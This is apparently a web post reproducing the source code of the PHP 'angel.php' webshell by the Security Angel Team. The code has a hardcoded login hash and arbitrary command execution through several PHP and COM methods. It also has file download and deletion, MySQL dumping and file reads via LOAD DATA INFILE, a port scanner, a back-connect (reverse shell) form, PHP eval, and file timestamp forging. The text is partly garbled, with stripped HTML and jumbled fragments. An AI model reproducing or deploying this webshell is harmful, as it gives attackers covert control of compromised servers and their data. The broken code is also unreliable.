angel.php webshell
- 发表于
- webshell
$value ) {
if ( IS_GPC ) {
$value = s_array( $value );
}
$$key = $value;
}
/*===================== 程序配置 =====================*/
//echo encode_pass('angel');exit;
//angel = ec38fe2a8497e0a8d6d349b3533038cb
// 如果需要密码验证,请修改登陆密码,留空为不需要验证
$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
// cookie 前缀
$cookiepre = '';
// cookie 作用域
$cookiedomain = '';
// cookie 作用路径
$cookiepath = '/';
// cookie 有效期
$cookielife = 86400;
//程序搜索可写文件的类型
! $writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
/*===================== 配置结束 =====================*/
$charsetdb = array(
'',
'armscii8',
'ascii',
'big5',
'binary',
'cp1250',
'cp1251',
'cp1256',
'cp1257',
'cp850',
'cp852',
'cp866',
'cp932',
'dec8',
'euc-jp',
'euc-kr',
'gb2312',
'gbk',
'geostd8',
'greek',
'hebrew',
'hp8',
'keybcs2',
'koi8r',
'koi8u',
'latin1',
'latin2',
'latin5',
'latin7',
'macce',
'macroman',
'sjis',
'swe7',
'tis620',
'ucs2',
'ujis',
'utf8'
);
if ( $charset == 'utf8' ) {
header( "content-Type: text/html; charset=utf-8" );
} elseif ( $charset == 'big5' ) {
header( "content-Type: text/html; charset=big5" );
} elseif ( $charset == 'gbk' ) {
header( "content-Type: text/html; charset=gbk" );
} elseif ( $charset == 'latin1' ) {
header( "content-Type: text/html; charset=iso-8859-2" );
} elseif ( $charset == 'euc-kr' ) {
header( "content-Type: text/html; charset=euc-kr" );
} elseif ( $charset == 'euc-jp' ) {
header( "content-Type: text/html; charset=euc-jp" );
}
$self= $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== 身份验证 =====================*/
if ( $action == "logout" ) {
scookie( 'loginpass', '', - 86400 * 365 );
@header( 'Location: ' . $self );
exit;
}
if ( $pass ) {
if ( $action == 'login' ) {
if ( $pass == encode_pass( $password ) ) {
scookie( 'loginpass', encode_pass( $password ) );
@header( 'Location: ' . $self );
exit;
}
}
if ( $_COOKIE['loginpass'] ) {
if ( $_COOKIE['loginpass'] != $pass ) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
$errmsg = '';
! $action && $action = 'file';
// 查看PHPINFO
if ( $action == 'phpinfo' ) {
if ( IS_PHPINFO ) {
phpinfo();
exit;
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}
// 下载文件
if ( $doing == 'downfile' && $thefile ) {
if ( ! @file_exists( $thefile ) ) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo( $thefile );
header( 'Content-type: application/x-' . $fileinfo['extension'] );
header( 'Content-Disposition: attachment; filename=' . $fileinfo['basename'] );
header( 'Content-Length: ' . filesize( $thefile ) );
@readfile( $thefile );
exit;
}
}
// 直接下载备份数据库
if ( $doing == 'backupmysql' && ! $saveasfile ) {
if ( ! $table ) {
$errmsg = 'Please choose the table';
} else {
$mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport );
$filename= basename( $dbname . '.sql' );
header( 'Content-type: application/unknown' );
header( 'Content-Disposition: attachment; filename=' . $filename );
foreach ( $table as $k => $v ) {
if ( $v ) {
sqldumptable( $v );
}
}
mysql_close();
exit;
}
}
// 通过MYSQL下载文件
if ( $doing == 'mysqldown' ) {
if ( ! $dbname ) {
$errmsg = 'Please input dbname';
} else {
$mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport );
if ( ! file_exists( $mysqldlfile ) ) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q( "select load_file('$mysqldlfile');" );
if ( ! $result ) {
q( "DROP TABLE IF EXISTS tmp_angel;" );
q( "CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);" );
//用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况
q( "LOAD DATA LOCAL INFILE '" . addslashes( $mysqldlfile ) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';" );
$result = q( "select content from tmp_angel" );
q( "DROP TABLE tmp_angel" );
}
$row = @mysql_fetch_array( $result );
if ( ! $row ) {
$errmsg = 'Load file failed ' . mysql_error();
} else {
$fileinfo = pathinfo( $mysqldlfile );
header( 'Content-type: application/x-' . $fileinfo['extension'] );
header( 'Content-Disposition: attachment; filename=' . $fileinfo['basename'] );
header( "Accept-Length: " . strlen( $row[0] ) );
echo $row[0];
exit;
}
}
}
}
?>
'opform' ) );
makehide( 'action', $action );
makehide( 'nowpath', $nowpath );
makehide( 'p1', $p1 );
makehide( 'p2', $p2 );
makehide( 'p3', $p3 );
makehide( 'p4', $p4 );
makehide( 'p5', $p5 );
formfoot();
if ( ! function_exists( 'posix_getegid' ) ) {
$user= @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid( @posix_geteuid() );
$gid = @posix_getgrgid( @posix_getegid() );
$user= $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
?>
| / User: () |
| PHP / Safe Mode: Logout | File Manager | MYSQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Port Scan | Security information | Eval PHP Code | Back Connect |
'createdir' ) );
makehide( 'newdirname' );
makehide( 'dir', $nowpath );
formfoot();
formhead( array( 'name' => 'fileperm' ) );
makehide( 'newperm' );
makehide( 'pfile' );
makehide( 'dir', $nowpath );
formfoot();
formhead( array( 'name' => 'copyfile' ) );
makehide( 'sname' );
makehide( 'tofile' );
makehide( 'dir', $nowpath );
formfoot();
formhead( array( 'name' => 'rename' ) );
makehide( 'oldname' );
makehide( 'newfilename' );
makehide( 'dir', $nowpath );
formfoot();
formhead( array( 'name' => 'fileopform', 'target' => '_blank' ) );
makehide( 'action' );
makehide( 'opfile' );
makehide( 'dir' );
formfoot();
formhead( array( 'name' => 'getsize' ) );
makehide( 'getdir' );
makehide( 'dir' );
formfoot();
$free = @disk_free_space( $nowpath );
! $free && $free = 0;
$all = @disk_total_space( $nowpath );
! $all && $all = 0;
$used = $all - $free;
p( '
File Manager - Current disk free ' . sizecount( $free ) . ' of ' . sizecount( $all ) . ' (' . @round( 100 / ( $all / $free ), 2 ) . '%)' ); $cwd_links = ''; $path= explode( '/', $nowpath ); $n = count( $path ); for ( $i = 0; $i < $n - 1; $i ++ ) { $cwd_links .= '' . $path[ $i ] . '/'; } ?>
';
$DriveTypeDB = array(
0 => 'Unknow',
1 => 'Removable',
2 => 'Fixed',
3 => 'Network',
4 => 'CDRom',
5 => 'RAM Disk'
);
$comma = '';
foreach ( $obj->Drives as $drive ) {
if ( $drive->Path ) {
p( $comma . 'Path . '/\');">' . $DriveTypeDB[ $drive->DriveType ] . '(' . $drive->Path . ')' );
$comma = '|';
}
}
echo ' ';
}
}
?>
| ' ); p( '' ); p( 'WebRoot' ); p( ' | ScriptPath' ); p( ' | View All' ); p( ' | View Writable ( Directory' ); p( ' | File )' ); p( ' | Create Directory | Create File' ); p( ' | ||||||||
| Filename | Last modified | Size | Chmod / Perms | Action | |||||
' ); p( 'DBHost:' ); makeinput( array( 'name' => 'dbhost', 'size' => 20, 'value' => $dbhost ) ); p( ':' ); makeinput( array( 'name' => 'dbport', 'size' => 4, 'value' => $dbport ) ); p( 'DBUser:' ); makeinput( array( 'name' => 'dbuser', 'size' => 15, 'value' => $dbuser ) ); p( 'DBPass:' ); makeinput( array( 'name' => 'dbpass', 'size' => 15, 'value' => $dbpass ) ); p( 'DBName:' ); makeinput( array( 'name' => 'dbname', 'size' => 15, 'value' => $dbname ) ); p( 'DBCharset:' ); makeselect( array( 'name' => 'charset', 'option' => $charsetdb, 'selected' => $charset, 'nokey'=> 1 ) ); p( '
' ); formfoot(); p( '' ); } elseif ( $action == 'mysqladmin' ) { ! $dbhost && $dbhost = 'localhost'; ! $dbuser && $dbuser = 'root'; ! $dbport && $dbport = '3306'; $dbform = ''; if ( isset( $dbhost ) ) { $dbform .= "\n"; } if ( isset( $dbuser ) ) { $dbform .= "\n"; } if ( isset( $dbpass ) ) { $dbform .= "\n"; } if ( isset( $dbport ) ) { $dbform .= "\n"; } if ( isset( $dbname ) ) { $dbform .= "\n"; } if ( isset( $charset ) ) { $dbform .= "\n"; } if ( $doing == 'backupmysql' && $saveasfile ) { if ( ! $table ) { m( 'Please choose the table' ); } else { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); $fp= @fopen( $path, 'w' ); if ( $fp ) { foreach ( $table as $k => $v ) { if ( $v ) { sqldumptable( $v, $fp ); } } fclose( $fp ); $fileurl = str_replace( SA_ROOT, '', $path ); m( 'Database has success backup to ' . $path . '' ); mysql_close(); } else { m( 'Backup failed' ); } } } if ( $insert && $insertsql ) { $keystr = $valstr = $tmp = ''; foreach ( $insertsql as $key => $val ) { if ( $val ) { $keystr .= $tmp . $key; $valstr .= $tmp . "'" . addslashes( $val ) . "'"; $tmp = ','; } } if ( $keystr && $valstr ) { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); m( q( "INSERT INTO $tablename ($keystr) VALUES ($valstr)" ) ? 'Insert new record of success' : mysql_error() ); } } if ( $update && $insertsql && $base64 ) { $valstr = $tmp = ''; foreach ( $insertsql as $key => $val ) { $valstr .= $tmp . $key . "='" . addslashes( $val ) . "'"; $tmp = ','; } if ( $valstr ) { $where = base64_decode( $base64 ); $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); m( q( "UPDATE $tablename SET $valstr WHERE $where LIMIT 1" ) ? 'Record updating' : mysql_error() ); } } if ( $doing == 'del' && $base64 ) { $where= base64_decode( $base64 ); $delete_sql = "DELETE FROM $tablename WHERE $where"; $mysqllink= mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); m( q( "DELETE FROM $tablename WHERE $where" ) ? 'Deletion record of success' : mysql_error() ); } if ( $tablename && $doing == 'drop' ) { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); if ( q( "DROP TABLE $tablename" ) ) { m( 'Drop table of success' ); $tablename = ''; } else { m( mysql_error() ); } } formhead( array( 'title' => 'MYSQL Manager' ) ); makehide( 'action', 'mysqladmin' ); p( '' ); p( 'DBHost:' ); makeinput( array( 'name' => 'dbhost', 'size' => 20, 'value' => $dbhost ) ); p( ':' ); makeinput( array( 'name' => 'dbport', 'size' => 4, 'value' => $dbport ) ); p( 'DBUser:' ); makeinput( array( 'name' => 'dbuser', 'size' => 15, 'value' => $dbuser ) ); p( 'DBPass:' ); makeinput( array( 'name' => 'dbpass', 'size' => 15, 'value' => $dbpass ) ); p( 'DBCharset:' ); makeselect( array( 'name' => 'charset', 'option' => $charsetdb, 'selected' => $charset, 'nokey'=> 1 ) ); makeinput( array( 'name'=> 'connect', 'value' => 'Connect', 'type'=> 'submit', 'class' => 'bt' ) ); p( '
' ); formfoot(); //操作记录 formhead( array( 'name' => 'recordlist' ) ); makehide( 'doing' ); makehide( 'action', 'mysqladmin' ); makehide( 'base64' ); makehide( 'tablename' ); p( $dbform ); formfoot(); //选定数据库 formhead( array( 'name' => 'setdbname' ) ); makehide( 'action', 'mysqladmin' ); p( $dbform ); if ( ! $dbname ) { makehide( 'dbname' ); } formfoot(); //选定表 formhead( array( 'name' => 'settable' ) ); makehide( 'action', 'mysqladmin' ); p( $dbform ); makehide( 'tablename' ); makehide( 'page', $page ); makehide( 'doing' ); formfoot(); $cachetables = array(); $pagenum = 30; $page= intval( $page ); if ( $page ) { $start_limit = ( $page - 1 ) * $pagenum; } else { $start_limit = 0; $page= 1; } if ( isset( $dbhost ) && isset( $dbuser ) && isset( $dbpass ) && isset( $connect ) ) { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); //获取数据库信息 $mysqlver = mysql_get_server_info(); p( 'MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '
' ); $highver = $mysqlver > '4.1' ? 1 : 0; //获取数据库 $query = q( "SHOW DATABASES" ); $dbs = array(); $dbs[] = '-- Select a database --'; while ( $db = mysql_fetch_array( $query ) ) { $dbs[ $db['Database'] ] = $db['Database']; } makeselect( array( 'title'=> 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline'=> 1 ) ); $tabledb = array(); if ( $dbname ) { p( '' ); p( 'Current dababase: ' . $dbname . '' ); if ( $tablename ) { p( ' | Current Table: ' . $tablename . ' [ Insert | Structure | Drop ]' ); } p( '
' ); mysql_select_db( $dbname ); $getnumsql = ''; $runquery= 0; if ( $sql_query ) { $runquery = 1; } $allowedit = 0; if ( $tablename && ! $sql_query ) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query . " LIMIT $start_limit, $pagenum"; $allowedit = 1; } p( '' ); if ( $tablename || ( $runquery && $sql_query ) ) { if ( $doing == 'structure' ) { $result = q( "SHOW FULL COLUMNS FROM $tablename" ); $rowdb= array(); while ( $row = mysql_fetch_array( $result ) ) { $rowdb[] = $row; } p( 'Structure
' ); p( '| Field | ' ); p( 'Type | ' ); p( 'Collation | ' ); p( 'Null | ' ); p( 'Key | ' ); p( 'Default | ' ); p( 'Extra | ' ); p( 'Privileges | ' ); p( 'Comment | ' ); p( '|
| ' . $row['Field'] . ' | ' ); p( '' . $row['Type'] . ' | ' ); p( '' . $row['Collation'] . ' | ' ); p( '' . $row['Null'] . ' | ' ); p( '' . $row['Key'] . ' | ' ); p( '' . $row['Default'] . ' | ' ); p( '' . $row['Extra'] . ' | ' ); p( '' . $row['Privileges'] . ' | ' ); p( '' . $row['Comment'] . ' | ' ); p( '
| Keyname | ' ); p( 'Type | ' ); p( 'Unique | ' ); p( 'Packed | ' ); p( 'Seq_in_index | ' ); p( 'Field | ' ); p( 'Cardinality | ' ); p( 'Collation | ' ); p( 'Null | ' ); p( 'Comment | ' ); p( '
| ' . $row['Key_name'] . ' | ' ); p( '' . $row['Index_type'] . ' | ' ); p( '' . ( $row['Non_unique'] ? 'No' : 'Yes' ) . ' | ' ); p( '' . ( $row['Packed'] === null ? 'No' : $row['Packed'] ) . ' | ' ); p( '' . $row['Seq_in_index'] . ' | ' ); p( '' . $row['Column_name'] . ( $row['Sub_part'] ? '(' . $row['Sub_part'] . ')' : '' ) . ' | ' ); p( '' . ( $row['Cardinality'] ? $row['Cardinality'] : 0 ) . ' | ' ); p( '' . $row['Collation'] . ' | ' ); p( '' . $row['Null'] . ' | ' ); p( '' . $row['Comment'] . ' | ' ); p( '
| Action | ' ); } $fieldnum = @mysql_num_fields( $result ); for ( $i = 0; $i < $fieldnum; $i ++ ) { $name = @mysql_field_name( $result, $i ); $type = @mysql_field_type( $result, $i ); $len= @mysql_field_len( $result, $i ); p( "$name $type($len)" . ( ( $rowdb[ $name ]['Key'] == 'UNI' || $rowdb[ $name ]['Key'] == 'PRI' ) ? ' - PRIMARY' : '' ) . ( $rowdb[ $name ]['Extra'] == 'auto_increment' ? ' - Auto' : '' ) . " | " );
}
p( '
| ' . html_clean( $inside ) . ' | '; } $where = base64_encode( $where ); if ( $allowedit ) { p( 'Edit | Del | ' ); } p( $b1 ); p( '
| Action | ' ); } $fieldnum = @mysql_num_fields( $result ); for ( $i = 0; $i < $fieldnum; $i ++ ) { $name = @mysql_field_name( $result, $i ); $type = @mysql_field_type( $result, $i ); $len= @mysql_field_len( $result, $i ); p( "$name $type($len)" . ( ( $rowdb[ $name ]['Key'] == 'UNI' || $rowdb[ $name ]['Key'] == 'PRI' ) ? ' - PRIMARY' : '' ) . ( $rowdb[ $name ]['Extra'] == 'auto_increment' ? ' - Auto' : '' ) . " | " );
}
p( '
' ); p( 'Your IP:' ); makeinput( array( 'name' => 'yourip', 'size' => 20, 'value' => $yourip ) ); p( 'Your Port:' ); makeinput( array( 'name' => 'yourport', 'size' => 15, 'value' => $yourport ) ); p( 'Use:' ); makeselect( array( 'name' => 'use', 'option' => $usedb, 'selected' => $use ) ); makeinput( array( 'name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt' ) ); p( '
' ); formfoot(); }//end elseif ( $action == 'portscan' ) { ! $scanip && $scanip = '127.0.0.1'; ! $scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; formhead( array( 'title' => 'Port Scan' ) ); makehide( 'action', 'portscan' ); p( '' ); p( 'IP:' ); makeinput( array( 'name' => 'scanip', 'size' => 20, 'value' => $scanip ) ); p( 'Port:' ); makeinput( array( 'name' => 'scanport', 'size' => 80, 'value' => $scanport ) ); makeinput( array( 'name' => 'startscan', 'value' => 'Scan', 'type' => 'submit', 'class' => 'bt' ) ); p( '
' ); formfoot(); if ( $startscan ) { p( 'Result »
' ); p( '- ' );
foreach ( explode( ',', $scanport ) as $port ) {
$fp = @fsockopen( $scanip, $port, &$errno, &$errstr, 1 );
if ( ! $fp ) {
p( '
- ' . $scanip . ':' . $port . ' ------------------------ Close ' ); } else { p( '
- ' . $scanip . ':' . $port . ' ------------------------ Open ' ); @fclose( $fp ); } } p( '
year:' ); makeinput( array( 'name' => 'year', 'value' => date( 'Y', $opfilemtime ), 'size' => 4 ) ); p( 'month:' ); makeinput( array( 'name' => 'month', 'value' => date( 'm', $opfilemtime ), 'size' => 2 ) ); p( 'day:' ); makeinput( array( 'name' => 'day', 'value' => date( 'd', $opfilemtime ), 'size' => 2 ) ); p( 'hour:' ); makeinput( array( 'name' => 'hour', 'value' => date( 'H', $opfilemtime ), 'size' => 2 ) ); p( 'minute:' ); makeinput( array( 'name' => 'minute', 'value' => date( 'i', $opfilemtime ), 'size' => 2 ) ); p( 'second:' ); makeinput( array( 'name' => 'second', 'value' => date( 's', $opfilemtime ), 'size' => 2 ) ); p( '
' ); formfooter(); goback(); }//end newtime elseif ( $action == 'shell' ) { if ( IS_WIN && IS_COM ) { if ( $program && $parameter ) { $shell = new COM( 'Shell.Application' ); $a = $shell->ShellExecute( $program, $parameter ); m( 'Program run has ' . ( ! $a ? 'success' : 'fail' ) ); } ! $program && $program = 'c:\windows\system32\cmd.exe'; ! $parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt'; formhead( array( 'title' => 'Execute Program' ) ); makehide( 'action', 'shell' ); makeinput( array( 'title' => 'Program', 'name'=> 'program', 'value' => $program, 'newline' => 1 ) ); p( '' ); makeinput( array( 'title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter ) ); makeinput( array( 'name'=> 'submit', 'class' => 'bt', 'type'=> 'submit', 'value' => 'Execute' ) ); p( '
' ); formfoot(); } formhead( array( 'title' => 'Execute Command' ) ); makehide( 'action', 'shell' ); if ( IS_WIN && IS_COM ) { $execfuncdb = array( 'phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open' ); makeselect( array( 'title'=> 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline'=> 1 ) ); } p( '' ); makeinput( array( 'title' => 'Command', 'name'=> 'command', 'value' => htmlspecialchars( $command ) ) ); makeinput( array( 'name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute' ) ); p( '
' ); formfoot(); if ( $command ) { p( '' );
if ( $execfunc == 'wscript' && IS_WIN && IS_COM ) {
$wsh = new COM( 'WScript.shell' );
$exec= $wsh->exec( 'cmd.exe /c ' . $command );
$stdout= $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ( $execfunc == 'proc_open' && IS_WIN && IS_COM ) {
$descriptorspec = array(
0 => array( 'pipe', 'r' ),
1 => array( 'pipe', 'w' ),
2 => array( 'pipe', 'w' )
);
$process= proc_open( $_SERVER['COMSPEC'], $descriptorspec, $pipes );
if ( is_resource( $process ) ) {
fwrite( $pipes[0], $command . "\r\n" );
fwrite( $pipes[0], "exit\r\n" );
fclose( $pipes[0] );
while ( ! feof( $pipes[1] ) ) {
echo fgets( $pipes[1], 1024 );
}
fclose( $pipes[1] );
while ( ! feof( $pipes[2] ) ) {
echo fgets( $pipes[2], 1024 );
}
fclose( $pipes[2] );
proc_close( $process );
}
} else {
echo( execute( $command ) );
}
p( '' );//此处prre请手动换成pre
}
}//end shell
elseif ( $action == 'phpenv' ) {
$upsize= getcfg( 'file_uploads' ) ? getcfg( 'upload_max_filesize' ) : 'Not allowed';
$adminmail = isset( $_SERVER['SERVER_ADMIN'] ) ? $_SERVER['SERVER_ADMIN'] : getcfg( 'sendmail_from' );
! $dis_func && $dis_func = 'No';
$info = array(
1=> array( 'Server Time', date( 'Y/m/d h:i:s', $timestamp ) ),
2=> array( 'Server Domain', $_SERVER['SERVER_NAME'] ),
3=> array( 'Server IP', gethostbyname( $_SERVER['SERVER_NAME'] ) ),
4=> array( 'Server OS', PHP_OS ),
5=> array( 'Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ),
6=> array( 'Server Software', $_SERVER['SERVER_SOFTWARE'] ),
7=> array( 'Server Web Port', $_SERVER['SERVER_PORT'] ),
8=> array( 'PHP run mode', strtoupper( php_sapi_name() ) ),
9=> array( 'The file path', __FILE__ ),
10 => array( 'PHP Version', PHP_VERSION ),
11 => array(
'PHPINFO',
( IS_PHPINFO ? 'Yes' : 'No' )
),
12 => array( 'Safe Mode', getcfg( 'safe_mode' ) ),
13 => array( 'Administrator', $adminmail ),
14 => array( 'allow_url_fopen', getcfg( 'allow_url_fopen' ) ),
15 => array( 'enable_dl', getcfg( 'enable_dl' ) ),
16 => array( 'display_errors', getcfg( 'display_errors' ) ),
17 => array( 'register_globals', getcfg( 'register_globals' ) ),
18 => array( 'magic_quotes_gpc', getcfg( 'magic_quotes_gpc' ) ),
19 => array( 'memory_limit', getcfg( 'memory_limit' ) ),
20 => array( 'post_max_size', getcfg( 'post_max_size' ) ),
21 => array( 'upload_max_filesize', $upsize ),
22 => array( 'max_execution_time', getcfg( 'max_execution_time' ) . ' second(s)' ),
23 => array( 'disable_functions', $dis_func ),
);
if ( $phpvarname ) {
m( $phpvarname . ' : ' . getcfg( $phpvarname ) );
}
formhead( array( 'title' => 'Server environment' ) );
makehide( 'action', 'phpenv' );
makeinput( array(
'title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)',
'name'=> 'phpvarname',
'value' => $phpvarname,
'newline' => 1
) );
formfooter();
$hp = array( 0 => 'Server', 1 => 'PHP' );
for ( $a = 0; $a < 2; $a ++ ) {
p( '' . $hp[ $a ] . ' »
' );
p( '- ' );
if ( $a == 0 ) {
for ( $i = 1; $i <= 9; $i ++ ) {
p( '
- ' . $info[ $i ][0] . ':' . $info[ $i ][1] . ' ' ); } } elseif ( $a == 1 ) { for ( $i = 10; $i <= 23; $i ++ ) { p( '
- ' . $info[ $i ][0] . ':' . $info[ $i ][1] . ' ' ); } } p( '
Powered by 2011. Copyright (C)
2004-2011 Security Angel Team [S4T] All Rights Reserved.
' . $n . ' »' );
p( '' );
if ( strpos( $v, "\n" ) === false ) {
p( $v . '
' ); } else { p( '
' );
}
}
function m( $msg ) {
echo '' ); } else { p( '
' . $v . '' );//此处prre请手动换成pre } p( '
';
echo $msg;
echo '
';
}
function scookie( $key, $value, $life = 0, $prefix = 1 ) {
global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
$key = ( $prefix ? $cookiepre : '' ) . $key;
$life= $life ? $life : $cookielife;
$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
setcookie( $key, $value, $timestamp + $life, $cookiepath, $cookiedomain, $useport );
}
function multi( $num, $perpage, $curpage, $tablename ) {
$multipage = '';
if ( $num > $perpage ) {
$page = 10;
$offset = 5;
$pages= @ceil( $num / $perpage );
if ( $page > $pages ) {
$from = 1;
$to = $pages;
} else {
$from = $curpage - $offset;
$to = $curpage + $page - $offset - 1;
if ( $from < 1 ) {
$to = $curpage + 1 - $from;
$from = 1;
if ( ( $to - $from ) < $page && ( $to - $from ) < $pages ) {
$to = $page;
}
} elseif ( $to > $pages ) {
$from = $curpage - $pages + $to;
$to = $pages;
if ( ( $to - $from ) < $page && ( $to - $from ) < $pages ) {
$from = $pages - $page + 1;
}
}
}
$multipage = ( $curpage - $offset > 1 && $pages > $page ? 'First ' : '' ) . ( $curpage > 1 ? 'Prev ' : '' );
for ( $i = $from; $i <= $to; $i ++ ) {
$multipage .= $i == $curpage ? $i . ' ' : '[' . $i . '] ';
}
$multipage .= ( $curpage < $pages ? 'Next' : '' ) . ( $to < $pages ? ' Last' : '' );
$multipage = $multipage ? 'Pages: ' . $multipage . '
' : ''; } return $multipage; } // 登陆入口 function loginpage() { ?> Can not connect to MySQL server' ); exit; } if ( $link && $dbname ) { if ( ! @mysql_select_db( $dbname, $link ) ) { p( 'Database selected has error
' ); exit; } } if ( $link && mysql_get_server_info() > '4.1' ) { if ( $charset && in_array( strtolower( $charset ), $charsetdb ) ) { q( "SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link ); } } return $link; } // 去掉转义字符 function s_array( &$array ) { if ( is_array( $array ) ) { foreach ( $array as $k => $v ) { $array[ $k ] = s_array( $v ); } } else if ( is_string( $array ) ) { $array = stripslashes( $array ); } return $array; } // 清除HTML代码 function html_clean( $content ) { $content = htmlspecialchars( $content ); $content = str_replace( "\n", "", $content ); $content = str_replace( "", " ", $content ); $content = str_replace( "\t", " ", $content ); return $content; } // 获取权限 function getChmod( $filepath ) { return substr( base_convert( @fileperms( $filepath ), 10, 8 ), - 4 ); } function getPerms( $filepath ) { $mode = @fileperms( $filepath ); if ( ( $mode & 0xC000 ) === 0xC000 ) { $type = 's'; } elseif ( ( $mode & 0x4000 ) === 0x4000 ) { $type = 'd'; } elseif ( ( $mode & 0xA000 ) === 0xA000 ) { $type = 'l'; } elseif ( ( $mode & 0x8000 ) === 0x8000 ) { $type = '-'; } elseif ( ( $mode & 0x6000 ) === 0x6000 ) { $type = 'b'; } elseif ( ( $mode & 0x2000 ) === 0x2000 ) { $type = 'c'; } elseif ( ( $mode & 0x1000 ) === 0x1000 ) { $type = 'p'; } else { $type = '?'; } $owner['read']= ( $mode & 00400 ) ? 'r' : '-'; $owner['write'] = ( $mode & 00200 ) ? 'w' : '-'; $owner['execute'] = ( $mode & 00100 ) ? 'x' : '-'; $group['read']= ( $mode & 00040 ) ? 'r' : '-'; $group['write'] = ( $mode & 00020 ) ? 'w' : '-'; $group['execute'] = ( $mode & 00010 ) ? 'x' : '-'; $world['read']= ( $mode & 00004 ) ? 'r' : '-'; $world['write'] = ( $mode & 00002 ) ? 'w' : '-'; $world['execute'] = ( $mode & 00001 ) ? 'x' : '-'; if ( $mode & 0x800 ) { $owner['execute'] = ( $owner['execute'] == 'x' ) ? 's' : 'S'; } if ( $mode & 0x400 ) { $group['execute'] = ( $group['execute'] == 'x' ) ? 's' : 'S'; } if ( $mode & 0x200 ) { $world['execute'] = ( $world['execute'] == 'x' ) ? 't' : 'T'; } return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute']; } function getUser( $filepath ) { if ( function_exists( 'posix_getpwuid' ) ) { $array = @posix_getpwuid( @fileowner( $filepath ) ); if ( $array && is_array( $array ) ) { return ' / ' . $array['name'] . ''; } } return ''; } // 删除目录 function deltree( $deldir ) { $mydir = @dir( $deldir ); while ( $file = $mydir->read() ) { if ( ( is_dir( $deldir . '/' . $file ) ) && ( $file != '.' ) && ( $file != '..' ) ) { @chmod( $deldir . '/' . $file, 0777 ); deltree( $deldir . '/' . $file ); } if ( is_file( $deldir . '/' . $file ) ) { @chmod( $deldir . '/' . $file, 0777 ); @unlink( $deldir . '/' . $file ); } } $mydir->close(); @chmod( $deldir, 0777 ); return @rmdir( $deldir ) ? 1 : 0; } // 表格行间的背景色替换 function bg() { global $bgc; return ( $bgc ++ % 2 == 0 ) ? 'alt1' : 'alt2'; } // 获取当前的文件系统路径 function getPath( $scriptpath, $nowpath ) { if ( $nowpath == '.' ) { $nowpath = $scriptpath; } $nowpath = str_replace( '\\', '/', $nowpath ); $nowpath = str_replace( '//', '/', $nowpath ); if ( substr( $nowpath, - 1 ) != '/' ) { $nowpath = $nowpath . '/'; } return $nowpath; } // 获取当前目录的上级目录 function getUpPath( $nowpath ) { $pathdb = explode( '/', $nowpath ); $num= count( $pathdb ); if ( $num > 2 ) { unset( $pathdb[ $num - 1 ], $pathdb[ $num - 2 ] ); } $uppath = implode( '/', $pathdb ) . '/'; $uppath = str_replace( '//', '/', $uppath ); return $uppath; } // 检查PHP配置参数 function getcfg( $varname ) { $result = get_cfg_var( $varname ); if ( $result == 0 ) { return 'No'; } elseif ( $result == 1 ) { return 'Yes'; } else { return $result; } } // 检查函数情况 function getfun( $funName ) { return ( false !== function_exists( $funName ) ) ? 'Yes' : 'No'; } // 获得文件扩展名 function getext( $file ) { $info = pathinfo( $file ); return $info['extension']; } function GetWDirList( $dir ) { global $dirdata, $j, $nowpath; ! $j && $j = 1; if ( $dh = opendir( $dir ) ) { while ( $file = readdir( $dh ) ) { $f = str_replace( '//', '/', $dir . '/' . $file ); if ( $file != '.' && $file != '..' && is_dir( $f ) ) { if ( is_writable( $f ) ) { $dirdata[ $j ]['filename']= str_replace( $nowpath, '', $f ); $dirdata[ $j ]['mtime'] = @date( 